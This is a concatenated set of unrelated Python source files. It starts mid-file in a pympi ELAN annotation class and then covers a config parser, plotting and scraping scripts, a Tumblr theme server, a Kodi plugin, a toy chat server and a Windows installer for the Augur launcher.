:param list tiers: Names of the tier to remove.
:raises KeyError: If a tier is non existent.
"""
for a in tiers:
self.remove_tier(a, check=False, clean=False)
self.clean_time_slots()
def remove_tier(self, id_tier, clean=True):
"""Remove tier.
:param str id_tier: Name of the tier.
:param bool clean: Flag to also clean the timeslots.
:raises KeyError: If tier is non existent.
"""
del(self.tiers[id_tier])
if clean:
self.clean_time_slots()
def get_tier_names(self):
"""List all the tier names.
:returns: List of all tier names
"""
return self.tiers.keys()
def get_parameters_for_tier(self, id_tier):
"""Give the parameter dictionary, this is usaable in :func:`add_tier`.
:param str id_tier: Name of the tier.
:returns: Dictionary of parameters.
:raises KeyError: If the tier is non existent.
"""
return self.tiers[id_tier][2]
def child_tiers_for(self, id_tier):
"""Give all child tiers for a tier.
:param str id_tier: Name of the tier.
:returns: List of all children
:raises KeyError: If the tier is non existent.
"""
return [m for m in self.tiers if 'PARENT_REF' in self.tiers[m][2] and
self.tiers[m][2]['PARENT_REF'] == id_tier]
def get_annotation_data_for_tier(self, id_tier):
"""Gives a list of annotations of the form: ``(begin, end, value)``
:param str id_tier: Name of the tier.
:raises KeyError: If the tier is non existent.
"""
a = self.tiers[id_tier][0]
return [(self.timeslots[a[b][0]], self.timeslots[a[b][1]], a[b][2])
for b in a]
def get_annotation_data_at_time(self, id_tier, time):
"""Give the annotations at the given time.
:param str id_tier: Name of the tier.
:param int time: Time of the annotation.
:returns: List of annotations at that time.
:raises KeyError: If the tier is non existent.
"""
anns = self.tiers[id_tier][0]
return sorted(
[(self.timeslots[m[0]], self.timeslots[m[1]], m[2])
for m in anns.itervalues() if
self.timeslots[m[0]] <= time and
self.timeslots[m[1]] >= time])
def get_annotation_datas_between_times(self, id_tier, start, end):
"""Gives the annotations within the times.
:param str id_tier: Name of the tier.
:param int start: Start time of the annotation.
:param int end: End time of the annotation.
:returns: List of annotations within that time.
:raises KeyError: If the tier is non existent.
"""
anns = self.tiers[id_tier][0]
return sorted([
(self.timeslots[m[0]], self.timeslots[m[1]], m[2])
for m in anns.itervalues() if self.timeslots[m[1]] >= start and
self.timeslots[m[0]] <= end])
def remove_all_annotations_from_tier(self, id_tier):
"""remove all annotations from a tier
:param str id_tier: Name of the tier.
:raises KeyError: If the tier is non existent.
"""
self.tiers[id_tier][0], self.tiers[id_tier][1] = {}, {}
self.clean_time_slots()
def insert_annotation(self, id_tier, start, end, value='', svg_ref=None):
"""Insert an annotation.
:param str id_tier: Name of the tier.
:param int start: Start time of the annotation.
:param int end: End time of the annotation.
:param str value: Value of the annotation.
:param str svg_ref: Svg reference.
:raises KeyError: If the tier is non existent.
"""
start_ts = self.generate_ts_id(start)
end_ts = self.generate_ts_id(end)
self.tiers[id_tier][0][self.generate_annotation_id()] =\
(start_ts, end_ts, value, svg_ref)
def remove_annotation(self, id_tier, time, clean=True):
"""Remove an annotation in a tier, if you need speed the best thing is
to clean the timeslots after the last removal.
:param str id_tier: Name of the tier.
:param int time: Timepoint within the annotation.
:param bool clean: Flag to clean the timeslots afterwards.
:raises KeyError: If the tier is non existent.
"""
for b in [a for a in self.tiers[id_tier][0].iteritems() if
a[1][0] >= time and a[1][1] <= time]:
del(self.tiers[id_tier][0][b[0]])
if clean:
self.clean_time_slots()
def insert_ref_annotation(self, id_tier, ref, value, prev, svg_ref=None):
"""Insert a reference annotation.
:param str id_tier: Name of the tier.
:param str ref: Id of the referenced annotation.
:param str value: Value of the annotation.
:param str prev: Id of the previous annotation.
:param str svg_ref: Svg reference.
:raises KeyError: If the tier is non existent.
"""
self.tiers[id_tier][1][self.generate_annotation_id()] =\
(ref, value, prev, svg_ref)
def get_ref_annotation_data_for_tier(self, id_tier):
""""Give a list of all reference annotations of the form:
``[{id -> (ref, value, previous, svg_ref}]``
:param str id_tier: Name of the tier.
:raises KeyError: If the tier is non existent.
"""
return self.tiers[id_tier][1]
def remove_controlled_vocabulary(self, cv):
"""Remove a controlled vocabulary.
:param str cv: Controlled vocabulary id.
:raises KeyError: If the controlled vocabulary is non existent.
"""
del(self.controlled_vocabularies[cv])
def generate_annotation_id(self):
"""Generate the next annotation id, this function is mainly used
internally.
"""
if self.naive_gen_ann:
new = self.last_ann+1
self.last_ann = new
else:
new = 1
anns = {int(ann[1:]) for tier in self.tiers.itervalues()
for ann in tier[0]}
if len(anns) > 0:
newann = set(xrange(1, max(anns))).difference(anns)
if len(newann) == 0:
new = max(anns)+1
self.naive_gen_ann = True
self.last_ann = new
else:
new = sorted(newann)[0]
return 'a%d' % new
def generate_ts_id(self, time=None):
"""Generate the next timeslot id, this function is mainly used
internally
:param int time: Initial time to assign to the timeslot
"""
if self.naive_gen_ts:
new = self.last_ts+1
self.last_ts = new
else:
new = 1
tss = {int(x[2:]) for x in self.timeslots}
if len(tss) > 0:
newts = set(xrange(1, max(tss))).difference(tss)
if len(newts) == 0:
new = max(tss)+1
self.naive_gen_ts = True
self.last_ts = new
else:
new = sorted(newts)[0]
ts = 'ts%d' % new
self.timeslots[ts] = time
return ts
def clean_time_slots(self):
"""Clean up all unused timeslots.
.. warning:: This can and will take time for larger tiers. When you
want to do a lot of operations on a lot of tiers please
unset the flags for cleaning in the functions so that the
cleaning is only performed afterwards.
"""
ts_in_tier = set(sum([a[0:2] for tier in self.tiers.itervalues()
for a in tier[0].itervalues()], ()))
ts_avail = set(self.timeslots)
for a in ts_in_tier.symmetric_difference(ts_avail):
del(self.timeslots[a])
self.naive_gen_ts = False
self.naive_gen_ann = False
def generate_annotation_concat(self, tiers, start, end, sep='-'):
"""Give a string of concatenated annotation values for annotations
within a timeframe.
:param list tiers: List of tier names.
:param int start: Start time.
:param int end: End time.
:param str sep: Separator string to use.
:returns: String containing a concatenation of annotation values.
:raises KeyError: If a tier is non existent.
"""
return sep.join(
set(d[2] for t in tiers if t in self.tiers for d in
self.get_annotation_datas_between_times(t, start, end)))
def merge_tiers(self, tiers, tiernew=None, gaptresh=1):
"""Merge tiers into a new tier and when the gap is lower then the
threshhold glue the annotations together.
:param list tiers: List of tier names.
:param str tiernew: Name for the new tier, if ``None`` the name will be
generated.
:param int gapthresh: Threshhold for the gaps.
:raises KeyError: If a tier is non existent.
:raises TypeError: If there are no annotations within the tiers.
"""
if tiernew is None:
tiernew = '%s_Merged' % '_'.join(tiers)
self.remove_tier(tiernew)
self.add_tier(tiernew)
timepts = sorted(set.union(
*[set(j for j in xrange(d[0], d[1])) for d in
[ann for tier in tiers for ann in
self.get_annotation_data_for_tier(tier)]]))
if len(timepts) > 1:
start = timepts[0]
for i in xrange(1, len(timepts)):
if timepts[i]-timepts[i-1] > gaptresh:
self.insert_annotation(
tiernew, start, timepts[i-1],
self.generate_annotation_concat(tiers, start,
timepts[i-1]))
start = timepts[i]
self.insert_annotation(
tiernew, start, timepts[i-1],
self.generate_annotation_concat(tiers, start, timepts[i-1]))
def shift_annotations(self, time):
"""Shift all annotations in time, this creates a new object.
:param int time: Time shift width, negative numbers make a right shift.
:returns: Shifted :class:`pympi.Elan.Eaf' object.
"""
e = self.extract(
-1*time, self.get_full_time_interval()[1]) if time < 0 else\
self.extract(0, self.get_full_time_interval()[1]-time)
for tier in e.tiers.itervalues():
for ann in tier[0].itervalues():
e.timeslots[ann[0]] = e.timeslots[ann[0]]+time
e.timeslots[ann[1]] = e.timeslots[ann[1]]+time
e.clean_time_slots()
return e
def filterAnnotations(self, tier, tier_name=None, filtin=None,
filtex=None):
"""Filter annotations in a tier
:param str tier: Name of the tier:
:param str tier_name: Name of the new tier, when ``None`` the name will
be generated.
:param list filtin: List of strings to be included, if None all
annotations all is included.
:param list filtex: List of strings to be excluded, if None no strings
are excluded.
:raises KeyError: If the tier is non existent.
"""
if tier_name is None:
tier_name = '%s_filter' % tier
self.remove_tier(tier_name)
self.add_tier(tier_name)
for a in [b for b in self.get_annotation_data_for_tier(tier)
if (filtex is None or b[2] not in filtex) and
(filtin is None or b[2] in filtin)]:
self.insert_annotation(tier_name, a[0], a[1], a[2])
def glue_annotations_in_tier(self, tier, tier_name=None, treshhold=85,
filtin=None, filtex=None):
"""Glue annotatotions together in a tier.
:param str tier: Name of the tier.
:param str tier_name: Name of the new tier, if ``None`` the name will
be generated.
:param int threshhold: Threshhold for the maximum gap to still glue.
:param list filtin: List of strings to be included, if None all
annotations all is included.
:param list filtex: List of strings to be excluded, if None no strings
are excluded.
:raises KeyError: If the tier is non existent.
"""
if tier_name is None:
tier_name = '%s_glued' % tier
self.remove_tier(tier_name)
self.add_tier(tier_name)
tier_data = sorted(self.get_annotation_data_for_tier(tier))
tier_data = [t for t in tier_data if
(filtin is None or t[2] in filtin) and
(filtex is None or t[2] not in filtex)]
currentAnn = None
for i in xrange(0, len(tier_data)):
if currentAnn is None:
currentAnn = (tier_data[i][0], tier_data[i][1],
tier_data[i][2])
elif tier_data[i][0] - currentAnn[1] < treshhold:
currentAnn = (currentAnn[0], tier_data[i][1],
'%s_%s' % (currentAnn[2], tier_data[i][2]))
else:
self.insert_annotation(tier_name, currentAnn[0], currentAnn[1],
currentAnn[2])
currentAnn = tier_data[i]
if currentAnn is not None:
self.insert_annotation(tier_name, currentAnn[0],
tier_data[len(tier_data)-1][1],
currentAnn[2])
def get_full_time_interval(self):
"""Give the full time interval of the file.
:returns: Tuple of the form: ``(min_time, max_time``.
"""
return (min(self.timeslots.itervalues()),
max(self.timeslots.itervalues()))
def create_gaps_and_overlaps_tier(self, tier1, tier2, tier_name=None,
maxlen=-1):
"""Create a tier with the gaps and overlaps of the annotations.
For types see :func:`get_gaps_and_overlaps_duration`
:param str tier1: Name of the first tier.
:param str tier2: Name of the second tier.
:param str tier_name: Name of the new tier, if ``None`` the name will
be generated.
:param int maxlen: Maximum length of gaps (skip longer ones), if ``-1``
no maximum will be used.
:returns: List of gaps and overlaps of the form:
``[(type, start, end)]``.
:raises KeyError: If a tier is non existent.
:raises IndexError: If no annotations are available in the tiers.
"""
if tier_name is None:
tier_name = '%s_%s_ftos' % (tier1, tier2)
self.remove_tier(tier_name)
self.add_tier(tier_name)
ftos = self.get_gaps_and_overlaps_duration(tier1, tier2, maxlen)
for fto in ftos:
self.insert_annotation(tier_name, fto[1], fto[2], fto[0])
return ftos
def get_gaps_and_overlaps_duration(self, tier1, tier2, maxlen=-1,
progressbar=False):
"""Give gaps and overlaps. The return types are shown in the table
below. The string will be of the format: ``id_tiername_tiername``.
For example when a gap occurs between tier1 and tier2 and they are
called ``speakerA`` and ``speakerB`` the annotation value of that gap
will be ``G12_speakerA_speakerB``.
| The gaps and overlaps are calculated using Heldner and Edlunds
method found in:
| *Heldner, M., & Edlund, J. (2010). Pauses, gaps and overlaps in
conversations. Journal of Phonetics, 38(4), 555–568.
doi:10.1016/j.wocn.2010.08.002*
+-----+--------------------------------------------+
| id | Description |
+=====+============================================+
| O12 | Overlap from tier1 to tier2 |
+-----+--------------------------------------------+
| O21 | Overlap from tier2 to tier1 |
+-----+--------------------------------------------+
| G12 | Gap from tier1 to tier2 |
+-----+--------------------------------------------+
| G21 | Gap from tier2 to tier1 |
+-----+--------------------------------------------+
| P1 | Pause for tier1 |
+-----+--------------------------------------------+
| P2 | Pause for tier2 |
+-----+--------------------------------------------+
| B12 | Within speaker overlap from tier1 to tier2 |
+-----+--------------------------------------------+
| B21 | Within speaker overlap from tier2 to tier1 |
+-----+--------------------------------------------+
:param str tier1: Name of the first tier.
:param str tier2: Name of the second tier.
:param int maxlen: Maximum length of gaps (skip longer ones), if ``-1``
no maximum will be used.
:param bool progressbar: Flag for debugging purposes that shows the
progress during the process.
:returns: List of gaps and overlaps of the form:
``[(type, start, end)]``.
:raises KeyError: If a tier is non existent.
:raises IndexError: If no annotations are available in the tiers.
"""
spkr1anns = sorted((self.timeslots[a[0]], self.timeslots[a[1]])
for a in self.tiers[tier1][0].values())
spkr2anns = sorted((self.timeslots[a[0]], self.timeslots[a[1]])
for a in self.tiers[tier2][0].values())
line1 = []
isin = lambda x, lst: False if\
len([i for i in lst if i[0] <= x and i[1] >= x]) == 0 else True
minmax = (min(spkr1anns[0][0], spkr2anns[0][0]),
max(spkr1anns[-1][1], spkr2anns[-1][1]))
last = (1, minmax[0])
lastP = 0
for ts in xrange(*minmax):
in1, in2 = isin(ts, spkr1anns), isin(ts, spkr2anns)
if in1 and in2: # Both speaking
if last[0] == 'B':
continue
ty = 'B'
elif in1: # Only 1 speaking
if last[0] == '1':
continue
ty = '1'
elif in2: # Only 2 speaking
if last[0] == '2':
continue
ty = '2'
else: # None speaking
if last[0] == 'N':
continue
ty = 'N'
line1.append((last[0], last[1], ts))
last = (ty, ts)
if progressbar and int((ts*1.0/minmax[1])*100) > lastP:
lastP = int((ts*1.0/minmax[1])*100)
print '%d%%' % lastP
line1.append((last[0], last[1], minmax[1]))
ftos = []
for i in xrange(len(line1)):
if line1[i][0] == 'N':
if i != 0 and i < len(line1) - 1 and\
line1[i-1][0] != line1[i+1][0]:
ftos.append(('G12_%s_%s' % (tier1, tier2)
if line1[i-1][0] == '1' else 'G21_%s_%s' %
(tier2, tier1), line1[i][1], line1[i][2]))
else:
ftos.append(('P_%s' %
(tier1 if line1[i-1][0] == '1' else tier2),
line1[i][1], line1[i][2]))
elif line1[i][0] == 'B':
if i != 0 and i < len(line1) - 1 and\
line1[i-1][0] != line1[i+1][0]:
ftos.append(('O12_%s_%s' % ((tier1, tier2)
if line1[i-1][0] else 'O21_%s_%s' %
(tier2, tier1)), line1[i][1], line1[i][2]))
else:
ftos.append(('B_%s_%s' % ((tier1, tier2)
if line1[i-1][0] == '1' else
(tier2, tier1)), line1[i][1], line1[i][2]))
return [f for f in ftos if maxlen == -1 or abs(f[2] - f[1]) < maxlen]
def create_controlled_vocabulary(self, cv_id, descriptions, entries,
ext_ref=None):
"""Create a controlled vocabulary.
.. warning:: This is a very raw implementation and you should check the
Eaf file format specification for the entries.
:param str cv_id: Name of the controlled vocabulary.
:param list descriptions: List of descriptions.
:param dict entries: Entries dictionary.
:param str ext_ref: External reference.
"""
self.controlledvocabularies[cv_id] = (descriptions, entries, ext_ref)
def get_tier_ids_for_linguistic_type(self, ling_type, parent=None):
"""Give a list of all tiers matching a linguistic type.
:param str ling_type: Name of the linguistic type.
:param str parent: Only match tiers from this parent, when ``None``
this option will be ignored.
:returns: List of tiernames.
:raises KeyError: If a tier or linguistic type is non existent.
"""
return [t for t in self.tiers if
self.tiers[t][2]['LINGUISTIC_TYPE_REF'] == ling_type and
(parent is None or self.tiers[t][2]['PARENT_REF'] == parent)]
def remove_linguistic_type(self, ling_type):
"""Remove a linguistic type.
:param str ling_type: Name of the linguistic type.
"""
del(self.linguistic_types[ling_type])
def add_linguistic_type(self, lingtype, constraints=None,
timealignable=True, graphicreferences=False,
extref=None):
"""Add a linguistic type.
:param str lingtype: Name of the linguistic type.
:param list constraints: Constraint names.
:param bool timealignable: Flag for time alignable.
:param bool graphicreferences: Flag for graphic references.
:param str extref: External reference.
"""
self.linguistic_types[lingtype] = {
'LINGUISTIC_TYPE_ID': lingtype,
'TIME_ALIGNABLE': str(timealignable).lower(),
'GRAPHIC_REFERENCES': str(graphicreferences).lower(),
'CONSTRAINTS': constraints}
if extref is not None:
self.linguistic_types[lingtype]['EXT_REF'] = extref
def get_linguistic_types(self):
"""Give a list of available linguistic types.
:returns: List of linguistic type names.
"""
return self.linguistic_types.keys()
|
Stiliyan92/accounting-system
|
common/config_parser.py
|
import configparser
CONFIG_PATH = 'accounting.conf'
class MyConfigParser():
def __init__(self, config_path=CONFIG_PATH):
self.config = configparser.ConfigParser(allow_no_value=True)
self.config.read(config_path)
def config_section_map(self, section):
""" returns all configuration options in 'section' in a dict with
key: config_option and value: the read value in the file"""
dict1 = {}
options = self.config.options(section)
for option in options:
try:
dict1[option] = self.config.get(section, option)
if dict1[option] == -1:
DebugPrint("skip: %s" % option)
except:
dict1[option] = None
return dict1
# getint(section, option)
# getboolean(section, option)
|
JHeimdal/HalIR
|
Test/plotf.py
|
#!/usr/bin/env python3
import sys
import numpy as np
from spc import SPC
import matplotlib.pyplot as plt
def plot(files, fac=1.0):
for f in files:
if f.split('.')[-1] == 'xy':
td = np.loadtxt(f)
plt.plot(td[:, 0], np.log(1. / td[:, 1]) * fac, label=f)
elif f.split('.')[-1] == 'spc':
td = SPC(f)
plt.plot(td.xdata, np.log(1. / np.array(td.ydata)), label=f)
plt.legend()
plt.show()
if __name__ == '__main__':
files = sys.argv[2:]
fac = float(sys.argv[1])
plot(files, fac)
|
jeremyherbert/TumblrServ
|
tumblrserv.py
|
#!/usr/bin/env python
## tumblrserv.py implements a Tumblr (http://www.tumblr.com) markup parsing
## engine and compatible webserver.
##
## Version: 0.2 final
##
## Copyright (C) 2009 Jeremy Herbert
## Contact mailto:jeremy@jeremyherbert.net
##
## This program is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License
## as published by the Free Software Foundation; either version 2
## of the License, or (at your option) any later version.
##
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with this program; if not, write to the Free Software
## Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
## 02110-1301, USA.
import os, sys, ftplib, yaml, cherrypy, re, urllib2
from src.post_classes import *
from src import json
from src.constants import *
from src.support import *
from src.net import *
from src.server import *
post_types = ['Regular', 'Photo', 'Quote', 'Link', 'Conversation', 'Video', 'Audio', 'Conversation']
args_dict = {
'autoreload': 0, # Whether to add the meta refresh tag
'publish': False, # Whether to push the new theme data to tumblr
'data_source': DATA_LOCAL, # Whether to use local data in the theme
}
########################################
# take the arguments and place them in a mutable list
arguments = sys.argv
# if the script has been run with the interpreter prefix, get rid of it
if arguments[0] == 'python' or arguments[0] == 'ipython' \
or arguments[0] == 'python2.5':
arguments.pop(0)
# pop off the script name
arguments.pop(0)
# load the configuration file
config_path = 'data/config.yml'
if contains(arguments, '--config'):
if os.path.exists(next_arg(arguments, '--config')):
config_path = next_arg(arguments, '--config')
config = get_config(config_path)
# now we check if there are any data processing flags
if contains(arguments, '--pull-data'):
# call pull_data with the argument after the flag
pull_data( next_arg(arguments, '--pull-data') )
if contains(arguments, '--theme'):
if not os.path.exists("themes/" + next_arg(arguments, '--theme') + '.thtml'):
err_exit("The theme file %s.thtml does not exist in the themes\
directory." % next_arg(arguments, '--theme'))
config['defaults']['theme_name'] = next_arg(arguments, '--theme')
if contains(arguments, '--publish'):
if not has_keys(config['publishing_info'], \
( 'url', 'username', 'password' )):
err_exit('The configuration file is missing some critical publishing\
information. Please make sure you have specified your url, username and\
password.')
publish_theme(config['publishing_info']['url'],\
config['publishing_info']['username'],\
config['publishing_info']['password'],\
get_markup('themes/%s.thtml' % config['defaults']['theme_name']))
if contains(arguments, '--do-nothing'):
config['optimisations']['do_nothing'] = True
# start the server up
cherrypy.config.update('data/cherrypy.conf')
cherrypy.quickstart(TumblrServ(config), '/')
|
ytsapras/robonet_site
|
scripts/rome_fields_dict.py
|
field_dict={'ROME-FIELD-01':[ 267.835895375 , -30.0608178195 , '17:51:20.6149','-30:03:38.9442' ],
'ROME-FIELD-02':[ 269.636745458 , -27.9782661111 , '17:58:32.8189','-27:58:41.758' ],
'ROME-FIELD-03':[ 268.000049542 , -28.8195573333 , '17:52:00.0119','-28:49:10.4064' ],
'ROME-FIELD-04':[ 268.180171708 , -29.27851275 , '17:52:43.2412','-29:16:42.6459' ],
'ROME-FIELD-05':[ 268.35435 , -30.2578356389 , '17:53:25.044','-30:15:28.2083' ],
'ROME-FIELD-06':[ 268.356124833 , -29.7729819283 , '17:53:25.47','-29:46:22.7349' ],
'ROME-FIELD-07':[ 268.529571333 , -28.6937071111 , '17:54:07.0971','-28:41:37.3456' ],
'ROME-FIELD-08':[ 268.709737083 , -29.1867251944 , '17:54:50.3369','-29:11:12.2107' ],
'ROME-FIELD-09':[ 268.881108542 , -29.7704673333 , '17:55:31.4661','-29:46:13.6824' ],
'ROME-FIELD-10':[ 269.048498333 , -28.6440675 , '17:56:11.6396','-28:38:38.643' ],
'ROME-FIELD-11':[ 269.23883225 , -29.2716684211 , '17:56:57.3197','-29:16:18.0063' ],
'ROME-FIELD-12':[ 269.39478875 , -30.0992361667 , '17:57:34.7493','-30:05:57.2502' ],
'ROME-FIELD-13':[ 269.563719375 , -28.4422328996 , '17:58:15.2927','-28:26:32.0384' ],
'ROME-FIELD-14':[ 269.758843 , -29.1796030365 , '17:59:02.1223','-29:10:46.5709' ],
'ROME-FIELD-15':[ 269.78359875 , -29.63940425 , '17:59:08.0637','-29:38:21.8553' ],
'ROME-FIELD-16':[ 270.074981708 , -28.5375585833 , '18:00:17.9956','-28:32:15.2109' ],
'ROME-FIELD-17':[ 270.81 , -28.0978333333 , '18:03:14.4','-28:05:52.2' ],
'ROME-FIELD-18':[ 270.290886667 , -27.9986032778 , '18:01:09.8128','-27:59:54.9718' ],
'ROME-FIELD-19':[ 270.312763708 , -29.0084241944 , '18:01:15.0633','-29:00:30.3271' ],
'ROME-FIELD-20':[ 270.83674125 , -28.8431573889 , '18:03:20.8179','-28:50:35.3666' ]}
|
poderomedia/kfdata
|
kgrants/spiders/grants.py
|
# -*- coding: utf-8 -*-
from scrapy.spider import Spider
from scrapy.selector import Selector
from kgrants.items import KgrantsItem
from scrapy.http import Request
import time
class GrantsSpider(Spider):
name = "grants"
allowed_domains = ["www.knightfoundation.org"]
pages = 1
base_url = 'http://www.knightfoundation.org'
start_url_str = 'http://www.knightfoundation.org/grants/?sort=title&page=%s'
def __init__(self, pages=None, *args, **kwargs):
super(GrantsSpider, self).__init__(*args, **kwargs)
if pages is not None:
self.pages = pages
self.start_urls = [ self.start_url_str % str(page) for page in xrange(1,int(self.pages)+1)]
def parse(self, response):
hxs = Selector(response)
projects = hxs.xpath('//article')
for project in projects:
time.sleep(2)
project_url = self.base_url + ''.join(project.xpath('a/@href').extract())
grants = KgrantsItem()
grants['page'] = project_url
grants['project'] = ''.join(project.xpath('a/div/header/h1/text()').extract()).strip()
grants['description'] = ''.join(project.xpath('p/text()').extract()).strip()
yield Request(grants['page'],
callback = self.parse_project,
meta={'grants':grants})
def parse_project(self,response):
hxs = Selector(response)
grants = response.meta['grants']
details = hxs.xpath('//section[@id="grant_info"]')
fields = hxs.xpath('//dt')
values = hxs.xpath('//dd')
self.log('field: <%s>' % fields.extract())
for item in details:
grants['fiscal_agent'] = ''.join(item.xpath('header/h2/text()').extract()).strip()
count = 0
for field in fields:
normalized_field = ''.join(field.xpath('text()').extract()).strip().lower().replace(' ','_')
self.log('field: <%s>' % normalized_field)
try:
grants[normalized_field] = values.xpath('text()').extract()[count]
except:
if normalized_field == 'community':
grants[normalized_field] = values.xpath('a/text()').extract()[1]
elif normalized_field == 'focus_area':
grants[normalized_field] = values.xpath('a/text()').extract()[0]
count += 1
grants['grantee_contact_email'] = ''.join(
item.xpath('section[@id="grant_contact"]/ul/li[@class="email"]/a/@href').extract()).replace('mailto:','').strip()
grants['grantee_contact_name'] = ''.join(
item.xpath('section[@id="grant_contact"]/ul/li[@class="email"]/a/text()').extract()).strip()
grants['grantee_contact_location'] = ''.join(
item.xpath('section[@id="grant_contact"]/ul/li[@class="location"]/text()').extract()).strip()
grants['grantee_contact_facebook'] = ''.join(
item.xpath('section[@id="grant_contact"]/ul/li[@class="facebook"]/a/@href').extract()).strip()
grants['grantee_contact_twitter'] = item.xpath('section[@id="grant_contact"]/ul/li[@class="twitter"]/a/@href').extract()
grants['grantee_contact_website'] = item.xpath('section[@id="grant_contact"]/ul/li[@class="website"]/a/@href').extract()
if 'grant_period' in grants:
grant_period = grants['grant_period'].split(' to ')
grants['grant_period_start'] = grant_period[0]
grants['grant_period_end'] = grant_period[1]
yield grants
|
maxiee/LearnPythonTheHardWayExercises
|
ex20.py
|
from sys import argv
script, input_file = argv
def print_all(f):
print f.read()
def rewind(f):
f.seek(0)
def print_a_line(line_count, f):
print line_count, f.readline()
current_file = open(input_file)
print "First let's print the whole file:\n"
print_all(current_file)
print "Now let's rewind, kind of like a tape."
rewind(current_file)
print "Let's print three lines:"
current_line = 1
print_a_line(current_line, current_file)
current_line = current_line + 1
print_a_line(current_line, current_file)
current_line = current_line + 1
print_a_line(current_line, current_file)
|
kodi-czsk/plugin.video.hejbejse.tv
|
resources/lib/hejbejse.py
|
# -*- coding: UTF-8 -*-
#/*
# * Copyright (C) 2011 Ivo Brhel
# *
# *
# * This Program is free software; you can redistribute it and/or modify
# * it under the terms of the GNU General Public License as published by
# * the Free Software Foundation; either version 2, or (at your option)
# * any later version.
# *
# * This Program is distributed in the hope that it will be useful,
# * but WITHOUT ANY WARRANTY; without even the implied warranty of
# * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# * GNU General Public License for more details.
# *
# * You should have received a copy of the GNU General Public License
# * along with this program; see the file COPYING. If not, write to
# * the Free Software Foundation, 675 Mass Ave, Cambridge, MA 02139, USA.
# * http://www.gnu.org/copyleft/gpl.html
# *
# */
import re,os,urllib,urllib2,cookielib
import util,resolver
from provider import ContentProvider
class HejbejseContentProvider(ContentProvider):
def __init__(self,username=None,password=None,filter=None):
ContentProvider.__init__(self,'hejbejse.tv','http://www.kynychova-tv.cz/',username,password,filter)
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.LWPCookieJar()))
urllib2.install_opener(opener)
def capabilities(self):
return ['resolve','categories','list']
def categories(self):
page = util.parse_html('http://www.kynychova-tv.cz/index.php?id=5')
result = []
for title,uri in [(x.h3.text,x.h3.a['href']) for x in page.select('div.entry5') if x.h3]:
item = self.dir_item()
item['title'] = title
item['url'] = uri
result.append(item)
return result
def list(self, url):
url = self._url(url)
page = util.parse_html(url)
result = []
for title,uri in [(x.img['title'],x['href']) for x in page.select('div.entry3')[0].findAll('a')]:
item = self.video_item()
item['title'] = title
item['url'] = uri
result.append(item)
return result
def resolve(self,item,captcha_cb=None,select_cb=None):
item = item.copy()
url = self._url(item['url'])
page = util.parse_html(url)
result = []
data=str(page.select('div.entry3 > center')[0])
resolved = resolver.findstreams(data,['<iframe(.+?)src=[\"\'](?P<url>.+?)[\'\"]'])
try:
for i in resolved:
item = self.video_item()
item['title'] = i['name']
item['url'] = i['url']
item['quality'] = i['quality']
item['surl'] = i['surl']
result.append(item)
except:
print '===Unknown resolver==='
if len(result)==1:
return result[0]
elif len(result) > 1 and select_cb:
return select_cb(result)
|
lovekun/Notebook
|
python/chatroomServer.py
|
import socket
import threading
import time
def tcplink(sock, addr):
print 'Accept new connection from %s:%s...' % addr
sock.send('Welcome!')
while True:
data = sock.recv(1024)
time.sleep(1)
if data == 'exit' or not data:
break
sock.send('Hello, %s!' % data)
sock.close()
print 'Connection from %s:%s closed.' % addr
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('127.0.0.1', 8888))
s.listen(5)
print 'Waiting for connection...'
while True:
sock, addr = s.accept()
t = threading.Thread(target=tcplink, args=(sock, addr))
t.start()
|
AugurProject/augur-launcher
|
Augur Installer.py
|
import os
import sys
import shutil
import binascii
import traceback
import subprocess
from win32com.client import Dispatch
LAUNCHER_PATH = "C:\\Program Files\\Augur"
DATA_PATH = os.path.join(os.path.expanduser('~'), 'AppData', 'Roaming', "Augur")
PASSFILE = os.path.join(DATA_PATH, "password.txt")
if getattr(sys, 'frozen', False):
# we are running in a |PyInstaller| bundle
BASEDIR = sys._MEIPASS
else:
# we are running in a normal Python environment
BASEDIR = os.path.dirname(os.path.abspath(__file__))
GETH_EXE = os.path.join(BASEDIR, 'geth.exe')
LAUNCHER_EXE = os.path.join(BASEDIR, 'augurlauncher.exe')
def main():
# first make all the appropriate directories
print("Making directories...")
for d in LAUNCHER_PATH, DATA_PATH:
print("Creating", d, end=" ", flush=True)
os.mkdir(d)
print("Success!")
print("Generating random password file...", end=" ", flush=True)
# then generate the password
password = binascii.b2a_hex(os.urandom(32))
passfile = open(PASSFILE, "w")
passfile.write(password.decode('ascii'))
passfile.close()
print("Success!")
# Then copy ".exe"s to the launcher path
exes = GETH_EXE, LAUNCHER_EXE
results = []
for exe in exes:
print("Copying", os.path.basename(exe), "to", LAUNCHER_PATH, "...", end=" ", flush=True)
results.append(shutil.copy(exe, LAUNCHER_PATH))
print("Sucess!")
print("Creating node account...", end=" ", flush=True)
# create account on node
p = subprocess.Popen([results[0],
"--password", PASSFILE,
"account", "new"])
p.wait()
print("Success!")
print("Creating shortcut...", end=" ", flush=True)
desktop = os.path.join(os.path.expanduser('~'), 'Desktop')
shortcut_path = os.path.join(desktop, "Augur Launcher.lnk")
wDir = LAUNCHER_PATH
shell = Dispatch('WScript.Shell')
shortcut = shell.CreateShortCut(shortcut_path)
shortcut.Targetpath = results[1]
shortcut.WorkingDirectory = wDir
shortcut.IconLocation = results[1]
shortcut.save()
print("Success!")
def uninstall():
paths = LAUNCHER_PATH, DATA_PATH
for p in paths:
print("Deleting", p, "...", end=" ", flush=True)
shutil.rmtree(p)
print("Success!")
print("Removing desktop shortcut...", end=" ", flush=True)
desktop = os.path.join(os.path.expanduser('~'), 'Desktop')
shortcut_path = os.path.join(desktop, "Augur Launcher.lnk")
os.remove(shortcut_path)
print("Success!")
if __name__ == '__main__':
try:
if len(sys.argv) == 2 and sys.argv[1] == 'uninstall':
uninstall()
elif len(sys.argv) == 1:
main()
else:
assert len(sys.argv) <= 2, "wrong number of arguements!"
except Exception as exc:
traceback.print_exc()
finally:
os.system("pause")
sys.exit(0)
|
ancho85/pylint-playero-plugin
|
tests/test_funcs.py
|
import unittest
from libs.funcs import *
class TestFuncs(unittest.TestCase):
def test_buildPaths(self):
recPaths, repPaths, rouPaths, corePaths = buildPaths()
